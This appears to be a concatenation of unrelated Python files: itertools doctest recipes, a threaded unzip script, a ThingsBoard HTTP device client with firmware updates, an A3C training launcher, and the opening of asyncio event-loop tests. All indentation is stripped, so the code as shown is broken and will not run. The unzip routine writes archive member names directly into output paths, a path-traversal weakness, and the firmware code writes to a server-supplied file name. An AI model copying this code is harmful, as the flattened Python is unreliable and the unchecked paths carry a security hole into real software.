... "Advance the iterator n-steps ahead. If n is None, consume entirely."
... # Use functions that consume iterators at C speed.
... if n is None:
... # feed the entire iterator into a zero-length deque
... collections.deque(iterator, maxlen=0)
... else:
... # advance to the empty slice starting at position n
... next(islice(iterator, n, n), None)
>>> def nth(iterable, n, default=None):
... "Returns the nth item or a default value"
... return next(islice(iterable, n, None), default)
>>> def all_equal(iterable):
... "Returns True if all the elements are equal to each other"
... g = groupby(iterable)
... return next(g, True) and not next(g, False)
>>> def quantify(iterable, pred=bool):
... "Count how many times the predicate is true"
... return sum(imap(pred, iterable))
>>> def padnone(iterable):
... "Returns the sequence elements and then returns None indefinitely"
... return chain(iterable, repeat(None))
>>> def ncycles(iterable, n):
... "Returns the sequence elements n times"
... return chain(*repeat(iterable, n))
>>> def dotproduct(vec1, vec2):
... return sum(imap(operator.mul, vec1, vec2))
>>> def flatten(listOfLists):
... return list(chain.from_iterable(listOfLists))
>>> def repeatfunc(func, times=None, *args):
... "Repeat calls to func with specified arguments."
... " Example: repeatfunc(random.random)"
... if times is None:
... return starmap(func, repeat(args))
... else:
... return starmap(func, repeat(args, times))
>>> def pairwise(iterable):
... "s -> (s0,s1), (s1,s2), (s2, s3), ..."
... a, b = tee(iterable)
... for elem in b:
... break
... return izip(a, b)
>>> def grouper(n, iterable, fillvalue=None):
... "grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"
... args = [iter(iterable)] * n
... return izip_longest(fillvalue=fillvalue, *args)
>>> def roundrobin(*iterables):
... "roundrobin('ABC', 'D', 'EF') --> A D E B F C"
... # Recipe credited to George Sakkis
... pending = len(iterables)
... nexts = cycle(iter(it).next for it in iterables)
... while pending:
... try:
... for next in nexts:
... yield next()
... except StopIteration:
... pending -= 1
... nexts = cycle(islice(nexts, pending))
>>> def powerset(iterable):
... "powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
... s = list(iterable)
... return chain.from_iterable(combinations(s, r) for r in range(len(s)+1))
>>> def unique_everseen(iterable, key=None):
... "List unique elements, preserving order. Remember all elements ever seen."
... # unique_everseen('AAAABBBCCDAABBB') --> A B C D
... # unique_everseen('ABBCcAD', str.lower) --> A B C D
... seen = set()
... seen_add = seen.add
... if key is None:
... for element in iterable:
... if element not in seen:
... seen_add(element)
... yield element
... else:
... for element in iterable:
... k = key(element)
... if k not in seen:
... seen_add(k)
... yield element
>>> def unique_justseen(iterable, key=None):
... "List unique elements, preserving order. Remember only the element just seen."
... # unique_justseen('AAAABBBCCDAABBB') --> A B C D A B
... # unique_justseen('ABBCcAD', str.lower) --> A B C A D
... return imap(next, imap(itemgetter(1), groupby(iterable, key)))
This is not part of the examples but it tests to make sure the definitions
perform as purported.
>>> take(10, count())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> list(enumerate('abc'))
[(0, 'a'), (1, 'b'), (2, 'c')]
>>> list(islice(tabulate(lambda x: 2*x), 4))
[0, 2, 4, 6]
>>> it = iter(xrange(10))
>>> consume(it, 3)
>>> next(it)
3
>>> consume(it)
>>> next(it, 'Done')
'Done'
>>> nth('abcde', 3)
'd'
>>> nth('abcde', 9) is None
True
>>> [all_equal(s) for s in ('', 'A', 'AAAA', 'AAAB', 'AAABA')]
[True, True, True, False, False]
>>> quantify(xrange(99), lambda x: x%2==0)
50
>>> a = [[1, 2, 3], [4, 5, 6]]
>>> flatten(a)
[1, 2, 3, 4, 5, 6]
>>> list(repeatfunc(pow, 5, 2, 3))
[8, 8, 8, 8, 8]
>>> import random
>>> take(5, imap(int, repeatfunc(random.random)))
[0, 0, 0, 0, 0]
>>> list(pairwise('abcd'))
[('a', 'b'), ('b', 'c'), ('c', 'd')]
>>> list(pairwise([]))
[]
>>> list(pairwise('a'))
[]
>>> list(islice(padnone('abc'), 0, 6))
['a', 'b', 'c', None, None, None]
>>> list(ncycles('abc', 3))
['a', 'b', 'c', 'a', 'b', 'c', 'a', 'b', 'c']
>>> dotproduct([1,2,3], [4,5,6])
32
>>> list(grouper(3, 'abcdefg', 'x'))
[('a', 'b', 'c'), ('d', 'e', 'f'), ('g', 'x', 'x')]
>>> list(roundrobin('abc', 'd', 'ef'))
['a', 'd', 'e', 'b', 'f', 'c']
>>> list(powerset([1,2,3]))
[(), (1,), (2,), (3,), (1, 2), (1, 3), (2, 3), (1, 2, 3)]
>>> all(len(list(powerset(range(n)))) == 2**n for n in range(18))
True
>>> list(powerset('abcde')) == sorted(sorted(set(powerset('abcde'))), key=len)
True
>>> list(unique_everseen('AAAABBBCCDAABBB'))
['A', 'B', 'C', 'D']
>>> list(unique_everseen('ABBCcAD', str.lower))
['A', 'B', 'C', 'D']
>>> list(unique_justseen('AAAABBBCCDAABBB'))
['A', 'B', 'C', 'D', 'A', 'B']
>>> list(unique_justseen('ABBCcAD', str.lower))
['A', 'B', 'C', 'A', 'D']
"""
__test__ = {'libreftest' : libreftest}
def test_main(verbose=None):
test_classes = (TestBasicOps, TestVariousIteratorArgs, TestGC,
RegressionTests, LengthTransparency,
SubclassWithKwargsTest, TestExamples,
TestPurePythonRoughEquivalents)
test_support.run_unittest(*test_classes)
# verify reference counting
if verbose and hasattr(sys, "gettotalrefcount"):
import gc
counts = [None] * 5
for i in xrange(len(counts)):
test_support.run_unittest(*test_classes)
gc.collect()
counts[i] = sys.gettotalrefcount()
print counts
# doctest the examples in the library reference
test_support.run_doctest(sys.modules[__name__], verbose)
if __name__ == "__main__":
test_main(verbose=True)
|
unzip.py
|
import os
import threading
import time
import zipfile
from src import UNZIPED_FOLDER_NAME
from src.io.get_files_dict import main as get_files_dict
from src.io.utils import create_folder, check_if_folder_is_empty, display_progress
dict_status = {}
chunk_size = 1024 * 1024 * 2
def main(folder_to_unzip=None): # pragma: no cover
dict_files_dict = get_files_dict()
folder_to_unzip = folder_to_unzip or dict_files_dict['folder_ref_date_save_zip']
started_at = time.time()
is_empty = check_if_folder_is_empty(folder_to_unzip)
if is_empty:
print('Folder is empty.. exiting.. nothing to unzip')
return False
folder_ref_date_save_zip = dict_files_dict['folder_ref_date_save_zip']
files_folder_ref_date_save_zip = [os.path.join(folder_ref_date_save_zip, file) for file in
os.listdir(folder_ref_date_save_zip)]
files_folder_ref_date_save_zip = [file for file in files_folder_ref_date_save_zip if file.endswith('.zip')]
folder_ref_date_save_unziped = os.path.join(folder_ref_date_save_zip, UNZIPED_FOLDER_NAME)
create_folder(folder_ref_date_save_unziped)
list_threads = []
for file in files_folder_ref_date_save_zip:
t = threading.Thread(target=unzip_file, args=(file, folder_ref_date_save_unziped, started_at))
t.start()
list_threads.append(t)
for t in list_threads:
t.join()
def unzip_file(file, folder_ref_date_save_unziped, started_at): # pragma: no cover
with zipfile.ZipFile(file, 'r') as zip_ref:
for file_name in zip_ref.namelist():
file_size_bytes = zip_ref.getinfo(file_name).file_size
file_target = os.path.join(folder_ref_date_save_unziped, file_name)
with open(file_target, 'wb') as outfile:
member_fd = zip_ref.open(file_name)
current_file_unziped_bytes = 0
while 1:
x = member_fd.read(chunk_size)
if not x:
break
current_file_unziped_bytes += outfile.write(x)
running_time_seconds = time.time() - started_at
speed = current_file_unziped_bytes / running_time_seconds if running_time_seconds > 0 else 0
eta = (file_size_bytes - current_file_unziped_bytes) / speed if running_time_seconds > 0 else 0
global dict_status
dict_status[file_name] = {'total_completed_bytes': current_file_unziped_bytes,
'file_size_bytes': file_size_bytes,
'pct_downloaded': current_file_unziped_bytes / file_size_bytes,
'started_at': started_at,
'running_time_seconds': running_time_seconds,
'speed': speed,
'eta': eta,
}
display_progress(dict_status, started_at=started_at, source='Unzip', th_to_display=0.01)
if __name__ == '__main__':
main()
|
tb_device_http.py
|
"""ThingsBoard HTTP API device module."""
import threading
import logging
import queue
import time
import typing
from datetime import datetime, timezone
from sdk_utils import verify_checksum
import requests
from math import ceil
FW_CHECKSUM_ATTR = "fw_checksum"
FW_CHECKSUM_ALG_ATTR = "fw_checksum_algorithm"
FW_SIZE_ATTR = "fw_size"
FW_TITLE_ATTR = "fw_title"
FW_VERSION_ATTR = "fw_version"
FW_STATE_ATTR = "fw_state"
REQUIRED_SHARED_KEYS = [FW_CHECKSUM_ATTR, FW_CHECKSUM_ALG_ATTR, FW_SIZE_ATTR, FW_TITLE_ATTR, FW_VERSION_ATTR]
class TBHTTPAPIException(Exception):
"""ThingsBoard HTTP Device API Exception class."""
class TBProvisionFailure(TBHTTPAPIException):
"""Exception raised if device provisioning failed."""
class TBHTTPDevice:
"""ThingsBoard HTTP Device API class.
:param host: The ThingsBoard hostname.
:param token: The device token.
:param name: A name for this device. The name is only set locally.
"""
def __init__(self, host: str, token: str, name: str = None, chunk_size: int = 0):
self.__session = requests.Session()
self.__session.headers.update({'Content-Type': 'application/json'})
self.__config = {
'host': host, 'token': token, 'name': name, 'timeout': 30
}
self.__worker = {
'publish': {
'queue': queue.Queue(),
'thread': threading.Thread(target=self.__publish_worker, daemon=True),
'stop_event': threading.Event()
},
'attributes': {
'thread': threading.Thread(target=self.__subscription_worker,
daemon=True,
kwargs={'endpoint': 'attributes'}),
'stop_event': threading.Event(),
},
'rpc': {
'thread': threading.Thread(target=self.__subscription_worker,
daemon=True,
kwargs={'endpoint': 'rpc'}),
'stop_event': threading.Event(),
}
}
self.current_firmware_info = {
"current_fw_title": None,
"current_fw_version": None
}
self.chunk_size = chunk_size
def __repr__(self):
return f'<ThingsBoard ({self.host}) HTTP device {self.name}>'
@property
def host(self) -> str:
"""Get the ThingsBoard hostname."""
return self.__config['host']
@property
def name(self) -> str:
"""Get the device name."""
return self.__config['name']
@property
def timeout(self) -> int:
"""Get the connection timeout."""
return self.__config['timeout']
@property
def api_base_url(self) -> str:
"""Get the ThingsBoard API base URL."""
return f'{self.host}/api/v1/{self.token}'
@property
def token(self) -> str:
"""Get the device token."""
return self.__config['token']
@property
def logger(self) -> logging.Logger:
"""Get the logger instance."""
return logging.getLogger('TBHTTPDevice')
@property
def log_level(self) -> str:
"""Get the log level."""
levels = {0: 'NOTSET', 10: 'DEBUG', 20: 'INFO', 30: 'WARNING', 40: 'ERROR', 50: 'CRITICAL'}
return levels.get(self.logger.level)
@log_level.setter
def log_level(self, value: typing.Union[int, str]):
self.logger.setLevel(value)
self.logger.critical('Log level set to %s', self.log_level)
def __get_firmware_info(self):
response = self.__session.get(
f"{self.__config['host']}/api/v1/{self.__config['token']}/attributes",
params={"sharedKeys": REQUIRED_SHARED_KEYS}).json()
return response.get("shared", {})
def __get_firmware(self, fw_info):
chunk_count = ceil(fw_info.get(FW_SIZE_ATTR, 0) / self.chunk_size) if self.chunk_size > 0 else 0
firmware_data = b''
for chunk_number in range(chunk_count + 1):
params = {"title": fw_info.get(FW_TITLE_ATTR),
"version": fw_info.get(FW_VERSION_ATTR),
"size": self.chunk_size if self.chunk_size < fw_info.get(FW_SIZE_ATTR,
0) else fw_info.get(
FW_SIZE_ATTR, 0),
"chunk": chunk_number
}
self.logger.debug(params)
self.logger.debug(
'Getting chunk with number: %s. Chunk size is : %r byte(s).' % (chunk_number + 1, self.chunk_size))
response = self.__session.get(
f"{self.__config['host']}/api/v1/{self.__config['token']}/firmware",
params=params)
if response.status_code != 200:
self.logger.error('Received error:')
response.raise_for_status()
return
firmware_data = firmware_data + response.content
return firmware_data
def __on_firmware_received(self, firmware_info, firmware_data):
with open(firmware_info.get(FW_TITLE_ATTR), "wb") as firmware_file:
firmware_file.write(firmware_data)
self.logger.info('Firmware is updated!\n Current firmware version is: %s' % firmware_info.get(FW_VERSION_ATTR))
def get_firmware_update(self):
self.send_telemetry(self.current_firmware_info)
self.logger.info('Getting firmware info from %s' % self.__config['host'])
firmware_info = self.__get_firmware_info()
if (firmware_info.get(FW_VERSION_ATTR) is not None and firmware_info.get(
FW_VERSION_ATTR) != self.current_firmware_info.get("current_" + FW_VERSION_ATTR)) \
or (firmware_info.get(FW_TITLE_ATTR) is not None and firmware_info.get(
FW_TITLE_ATTR) != self.current_firmware_info.get("current_" + FW_TITLE_ATTR)):
self.logger.info('New firmware available!')
self.current_firmware_info[FW_STATE_ATTR] = "DOWNLOADING"
time.sleep(1)
self.send_telemetry(self.current_firmware_info)
firmware_data = self.__get_firmware(firmware_info)
self.current_firmware_info[FW_STATE_ATTR] = "DOWNLOADED"
time.sleep(1)
self.send_telemetry(self.current_firmware_info)
verification_result = verify_checksum(firmware_data, firmware_info.get(FW_CHECKSUM_ALG_ATTR),
firmware_info.get(FW_CHECKSUM_ATTR))
if verification_result:
self.logger.debug('Checksum verified!')
self.current_firmware_info[FW_STATE_ATTR] = "VERIFIED"
time.sleep(1)
self.send_telemetry(self.current_firmware_info)
else:
self.logger.debug('Checksum verification failed!')
self.current_firmware_info[FW_STATE_ATTR] = "FAILED"
time.sleep(1)
self.send_telemetry(self.current_firmware_info)
firmware_data = self.__get_firmware(firmware_info)
return
self.current_firmware_info[FW_STATE_ATTR] = "UPDATING"
time.sleep(1)
self.send_telemetry(self.current_firmware_info)
self.__on_firmware_received(firmware_info, firmware_data)
current_firmware_info = {
"current_" + FW_TITLE_ATTR: firmware_info.get(FW_TITLE_ATTR),
"current_" + FW_VERSION_ATTR: firmware_info.get(FW_VERSION_ATTR),
FW_STATE_ATTR: "UPDATED"
}
time.sleep(1)
self.send_telemetry(current_firmware_info)
def start_publish_worker(self):
"""Start the publish worker thread."""
self.__worker['publish']['stop_event'].clear()
self.__worker['publish']['thread'].start()
def stop_publish_worker(self):
"""Stop the publish worker thread."""
self.__worker['publish']['stop_event'].set()
def __publish_worker(self):
"""Publish telemetry data from the queue."""
logger = self.logger.getChild('worker.publish')
logger.info('Start publisher thread')
logger.debug('Perform connection test before entering worker loop')
if not self.test_connection():
logger.error('Connection test failed, exit publisher thread')
return
logger.debug('Connection test successful')
while True:
if not self.__worker['publish']['queue'].empty():
try:
task = self.__worker['publish']['queue'].get(timeout=1)
except queue.Empty:
if self.__worker['publish']['stop_event'].is_set():
break
continue
endpoint = task.pop('endpoint')
try:
self._publish_data(task, endpoint)
except Exception as error:
# ToDo: More precise exception catching
logger.error(error)
task.update({'endpoint': endpoint})
self.__worker['publish']['queue'].put(task)
time.sleep(1)
else:
logger.debug('Published %s to %s', task, endpoint)
self.__worker['publish']['queue'].task_done()
time.sleep(.2)
logger.info('Stop publisher thread.')
def test_connection(self) -> bool:
"""Test connection to the API.
:return: True if no errors occurred, False otherwise.
"""
self.logger.debug('Start connection test')
success = False
try:
self._publish_data(data={}, endpoint='telemetry')
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as error:
self.logger.debug(error)
except requests.exceptions.HTTPError as error:
self.logger.debug(error)
status_code = error.response.status_code
if status_code == 401:
self.logger.error('Error 401: Unauthorized. Check if token is correct.')
else:
self.logger.error('Error %s', status_code)
else:
self.logger.debug('Connection test successful')
success = True
finally:
self.logger.debug('End connection test')
return success
def connect(self) -> bool:
"""Publish an empty telemetry data to ThingsBoard to test the connection.
:return: True if connected, false otherwise.
"""
if self.test_connection():
self.logger.info('Connected to ThingsBoard')
self.start_publish_worker()
return True
return False
def _publish_data(self, data: dict, endpoint: str, timeout: int = None) -> dict:
"""Send POST data to ThingsBoard.
:param data: The data dictionary to send.
:param endpoint: The receiving API endpoint.
:param timeout: Override the instance timeout for this request.
"""
response = self.__session.post(
url=f'{self.api_base_url}/{endpoint}',
json=data,
timeout=timeout or self.timeout)
response.raise_for_status()
return response.json() if response.content else {}
def _get_data(self, params: dict, endpoint: str, timeout: int = None) -> dict:
"""Retrieve data with GET from ThingsBoard.
:param params: A dictionary with the parameters for the request.
:param endpoint: The receiving API endpoint.
:param timeout: Override the instance timeout for this request.
:return: A dictionary with the response from the ThingsBoard instance.
"""
response = self.__session.get(
url=f'{self.api_base_url}/{endpoint}',
params=params,
timeout=timeout or self.timeout)
response.raise_for_status()
return response.json()
def send_telemetry(self, telemetry: dict, timestamp: datetime = None, queued: bool = True):
"""Publish telemetry to ThingsBoard.
:param telemetry: A dictionary with the telemetry data to send.
:param timestamp: Timestamp to set for the values. If not set the ThingsBoard server uses
the time of reception as timestamp.
:param queued: Add the telemetry to the queue. If False, the data is send immediately.
"""
timestamp = datetime.now() if timestamp is None else timestamp
payload = {
'ts': int(timestamp.replace(tzinfo=timezone.utc).timestamp() * 1000),
'values': telemetry,
}
if queued:
payload.update({'endpoint': 'telemetry'})
self.__worker['publish']['queue'].put(payload)
else:
self._publish_data(payload, 'telemetry')
def send_attributes(self, attributes: dict):
"""Send attributes to ThingsBoard.
:param attributes: Attributes to send.
"""
self._publish_data(attributes, 'attributes')
def send_rpc(self, name: str, params: dict = None, rpc_id: int = None) -> dict:
"""Send RPC to ThingsBoard and return response.
:param name: Name of the RPC method.
:param params: Parameter for the RPC.
:param rpc_id: Specify an Id for this RPC.
:return: A dictionary with the response.
"""
endpoint = f'rpc/{rpc_id}' if rpc_id else 'rpc'
return self._publish_data({'method': name, 'params': params or {}}, endpoint)
def request_attributes(self, client_keys: list = None, shared_keys: list = None) -> dict:
"""Request attributes from ThingsBoard.
:param client_keys: A list of keys for client attributes.
:param shared_keys: A list of keys for shared attributes.
:return: A dictionary with the request attributes.
"""
params = {'client_keys': client_keys, 'shared_keys': shared_keys}
return self._get_data(params=params, endpoint='attributes')
def __subscription_worker(self, endpoint: str, timeout: int = None):
"""Worker thread for subscription to HTTP API endpoints.
:param endpoint: The endpoint name.
:param timeout: Timeout value in seconds.
"""
logger = self.logger.getChild(f'worker.subscription.{endpoint}')
stop_event = self.__worker[endpoint]['stop_event']
logger.info('Start subscription to %s updates', endpoint)
if not self.__worker[endpoint].get('callback'):
logger.warning('No callback set for %s subscription', endpoint)
stop_event.set()
callback = self.__worker[endpoint].get('callback', lambda data: None)
params = {
'timeout': (timeout or self.timeout) * 1000
}
url = {
'attributes': f'{self.api_base_url}/attributes/updates',
'rpc': f'{self.api_base_url}/rpc'
}
logger.debug('Timeout set to %ss', params['timeout'] / 1000)
while not stop_event.is_set():
response = self.__session.get(url=url[endpoint],
params=params,
timeout=params['timeout'])
if stop_event.is_set():
break
if response.status_code == 408: # Request timeout
continue
if response.status_code == 504: # Gateway Timeout
continue # Reconnect
response.raise_for_status()
callback(response.json())
time.sleep(.1)
stop_event.clear()
logger.info('Stop subscription to %s updates', endpoint)
def subscribe(self, endpoint: str, callback: typing.Callable[[dict], None] = None):
"""Subscribe to updates from a given endpoint.
:param endpoint: The endpoint to subscribe.
:param callback: Callback to execute on an update. Takes a dict as only argument.
"""
if endpoint not in ['attributes', 'rpc']:
raise ValueError
if callback:
if not callable(callback):
raise TypeError
self.__worker[endpoint]['callback'] = callback
self.__worker[endpoint]['stop_event'].clear()
self.__worker[endpoint]['thread'].start()
def unsubscribe(self, endpoint: str):
"""Unsubscribe from a given endpoint.
:param endpoint: The endpoint to unsubscribe.
"""
if endpoint not in ['attributes', 'rpc']:
raise ValueError
self.logger.debug('Set stop event for %s subscription', endpoint)
self.__worker[endpoint]['stop_event'].set()
@classmethod
def provision(cls, host: str, device_name: str, device_key: str, device_secret: str):
"""Initiate device provisioning and return a device instance.
:param host: The root URL to the ThingsBoard instance.
:param device_name: Name of the device to provision.
:param device_key: Provisioning device key from ThingsBoard.
:param device_secret: Provisioning secret from ThingsBoard.
:return: Instance of :class:`TBHTTPClient`
"""
data = {
'deviceName': device_name,
'provisionDeviceKey': device_key,
'provisionDeviceSecret': device_secret
}
response = requests.post(f'{host}/api/v1/provision', json=data)
response.raise_for_status()
device = response.json()
if device['status'] == 'SUCCESS' and device['credentialsType'] == 'ACCESS_TOKEN':
return cls(host=host, token=device['credentialsValue'], name=device_name)
raise TBProvisionFailure(device)
class TBHTTPClient(TBHTTPDevice):
"""Legacy class name."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.logger.critical('TBHTTPClient class is deprecated, please use TBHTTPDevice')
|
main.py
|
from __future__ import print_function, division
import os
os.environ["OMP_NUM_THREADS"] = "1"
import argparse
import torch
import torch.multiprocessing as mp
from environment import atari_env
from utils import read_config
from model import A3Clstm
from train import train
from test import test
from shared_optim import SharedRMSprop, SharedAdam
#from gym.configuration import undo_logger_setup
import time
# add an option for enabling terminal prediction loss
#undo_logger_setup()
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument(
'--lr',
type=float,
default=0.0001,
metavar='LR',
help='learning rate (default: 0.0001)')
parser.add_argument(
'--tp',
type=float,
default=0.5,
metavar='TP',
help='terminal prediction aux loss weight (default: 0.5)')
parser.add_argument(
'--gamma',
type=float,
default=0.99,
metavar='G',
help='discount factor for rewards (default: 0.99)')
parser.add_argument(
'--tau',
type=float,
default=1.00,
metavar='T',
help='parameter for GAE (default: 1.00)')
parser.add_argument(
'--seed',
type=int,
default=1,
metavar='S',
help='random seed (default: 1)')
parser.add_argument(
'--terminal-prediction',
action="store_true",
default=False,
help='Enable or Disable Terminal Prediction Auxiliary Task') # this is our novel addition to the general A3C
parser.add_argument(
'--reward-prediction',
action="store_true",
default=False,
help='Enable or Disable Reward Prediction Auxiliary Task') # this is to compare UNREAL setting.
parser.add_argument(
'--render',
action="store_true",
default=False,
help='Enable or Disable Game Rendering') # added to watch test plays
parser.add_argument(
'--workers',
type=int,
default=32,
metavar='W',
help='how many training processes to use (default: 32)')
parser.add_argument(
'--num-steps',
type=int,
default=20,
metavar='NS',
help='number of forward steps in A3C (default: 20)')
parser.add_argument(
'--max-episode-length',
type=int,
default=10000,
metavar='M',
help='maximum length of an episode (default: 10000)')
parser.add_argument(
'--env',
default='Pong-v0',
metavar='ENV',
help='environment to train on (default: Pong-v0)')
parser.add_argument(
'--env-config',
default='config.json',
metavar='EC',
help='environment to crop and resize info (default: config.json)')
parser.add_argument(
'--shared-optimizer',
default=True,
metavar='SO',
help='use an optimizer without shared statistics.')
parser.add_argument(
'--load',
default=False,
metavar='L',
help='load a trained model')
parser.add_argument(
'--save-max',
default=True,
metavar='SM',
help='Save model on every test run high score matched or bested')
parser.add_argument(
'--optimizer',
default='Adam',
metavar='OPT',
help='shares optimizer choice of Adam or RMSprop')
parser.add_argument(
'--load-model-dir',
default='trained_models/',
metavar='LMD',
help='folder to load trained models from')
parser.add_argument(
'--save-model-dir',
default='trained_models/',
metavar='SMD',
help='folder to save trained models')
parser.add_argument(
'--log-dir', default='logs/', metavar='LG', help='folder to save logs')
parser.add_argument(
'--gpu-ids',
type=int,
default=-1,
nargs='+',
help='GPUs to use [-1 CPU only] (default: -1)')
parser.add_argument(
'--amsgrad',
default=True,
metavar='AM',
help='Adam optimizer amsgrad parameter')
parser.add_argument(
'--skip-rate',
type=int,
default=4,
metavar='SR',
help='frame skip rate (default: 4)')
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
# Implemented multiprocessing using locks but was not beneficial. Hogwild
# training was far superior
if __name__ == '__main__':
args = parser.parse_args()
torch.manual_seed(args.seed)
if args.gpu_ids == -1:
args.gpu_ids = [-1]
else:
torch.cuda.manual_seed(args.seed)
mp.set_start_method('spawn')
setup_json = read_config(args.env_config)
env_conf = setup_json["Default"]
for i in setup_json.keys():
if i in args.env:
env_conf = setup_json[i]
env = atari_env(args.env, env_conf, args)
shared_model = A3Clstm(env.observation_space.shape[0], env.action_space, args.terminal_prediction, args.reward_prediction) # this is global NN copy workers sync to-from ...
if args.load:
saved_state = torch.load(
'{0}{1}.dat'.format(args.load_model_dir, args.env),
map_location=lambda storage, loc: storage)
shared_model.load_state_dict(saved_state)
shared_model.share_memory()
if args.shared_optimizer:
if args.optimizer == 'RMSprop':
optimizer = SharedRMSprop(shared_model.parameters(), lr=args.lr)
if args.optimizer == 'Adam':
optimizer = SharedAdam(
shared_model.parameters(), lr=args.lr, amsgrad=args.amsgrad)
optimizer.share_memory()
else:
optimizer = None
processes = []
print(shared_model)
p = mp.Process(target=test, args=(args, shared_model, env_conf))
p.start()
processes.append(p)
time.sleep(0.1)
for rank in range(0, args.workers):
p = mp.Process(target=train, args=(rank, args, shared_model, optimizer, env_conf))
p.start()
processes.append(p)
time.sleep(0.1)
for p in processes:
time.sleep(0.1)
p.join()
|
test_events.py
|
"""Tests for events.py."""
import collections.abc
import functools
import gc
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import proactor_events
from asyncio import selector_events
from asyncio import sslproto
from asyncio import test_utils
try:
from test import support
except ImportError:
from asyncio import test_support as support
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
def osx_tiger():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
PEERCERT = {'serialNumber': 'B09264B1F2DA21D1',
'version': 1,
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Nov 13 19:47:07 2022 GMT',
'notBefore': 'Jan 4 19:47:07 2013 GMT'}
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
def test_run_until_complete_nesting(self):
@asyncio.coroutine
def coro1():
yield
@asyncio.coroutine
def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
